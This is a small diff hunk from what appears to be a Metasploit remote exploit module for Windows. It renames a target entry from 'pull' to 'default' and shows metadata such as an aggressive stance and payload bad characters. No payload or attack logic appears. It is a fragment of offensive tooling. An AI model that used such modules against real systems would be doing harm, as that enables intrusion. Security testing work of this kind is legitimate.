@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => 'win',
         'Stance' => Msf::Exploit::Stance::Aggressive,
         'Targets' => [
-          ['pull', {}],
+          ['default', {}],
         ],
         'Payload' => {
           'BadChars' => "\x0a\x00"
